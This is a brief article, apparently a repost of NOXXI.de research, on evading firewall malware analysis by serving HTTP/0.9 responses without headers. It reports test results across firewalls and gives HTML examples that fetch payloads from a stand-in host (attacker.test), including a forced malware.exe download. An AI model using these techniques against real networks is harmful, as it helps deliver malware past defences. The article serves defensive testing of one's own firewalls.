HTTP Malware Analysis Evasion

HTTP Malware Analysis Evasion

In this article published by NOXXI.de author explains that are possible using HTTP evader.

The very first version of HTTP protocol was version 0.9 that was introduced in early 1991. This HTTP protocol only consisted of a GET request followed by a response from server side. Contrary to HTTP 1.0 (specified 1996) the response does not consist of the response header and the response body, but only contains the body. This means it is not possible to specify the data type (Content-type), use compressions (Content-Encoding) or give the length of the body (Content-Length), so the response simply ends with the close of the underlying TCP connection by the server.

Modern HTTP protocol is v 1.1 and it looks similar to this:

 HTTP/1.1 200 ok 
  Content-type: application/octet-stream
  Content-length: 68

  malware-here

But in HTTP protocol v 0.9 request was quite simple:

  some-malware-here

Today even modern browsers support both protocols, which gives a way to a new type of HTTP evasion.

Using HTTP 0.9 to Evade Malware Analysis

DIfferenlty from HTTP 1.x the older protocol does not include a response header. Thus one would expect a firewall to actually block such a response, because it looks like a violation of the HTTP protocol. And no sane firewall today should assume that there is a real HTTP 0.9 server still used in production. Alternatively the firewall might do a malware analysis of the HTTP 0.9 response.

But, surprisingly most of the firewalls tested by the author simply pass an HTTP/0.9 response through without further inspection. From the 5 Gartner-Top 10 firewalls in the test reports from the users of HTTP evader, only a single one blocks these responses and all the others (i.e. 80%) could be bypassed this way. Since they don’t analyze these HTTP 0.9 responses for malware one might assume that these firewalls simply let everything pass what they don’t understand.

Since at the time HTTP 0.9 was defined it was used to display HTML only (no content type could be defined) one might consider it not dangerous because it only gets displayed in the browser. But by combining the old HTTP 0.9 with the modern HTML 5 one might simply enforce a download by using the download attribute:

   <a href="http://attacker.test/http09-response" download="malware.exe">

Similarly a HTTP 0.9 response could be used as script, image or HTML page by embedding it inside the appropriate context:

   <script src="http://attacker.test/http09-response.js">
   <img src="http://attacker.test/http09-response.gif">
   <a href="http://attacker.test/http09-response.html">

This way any other filtering based on the type of the content could be bypassed.

If you are behind some content filtering firewall you might test if its malware analysis of HTTP traffic could be evaded by this or other methods. All you need a browser and then follow the instructions to test against the HTTP evader tool.

Source NOXXI.DE

Leave a Reply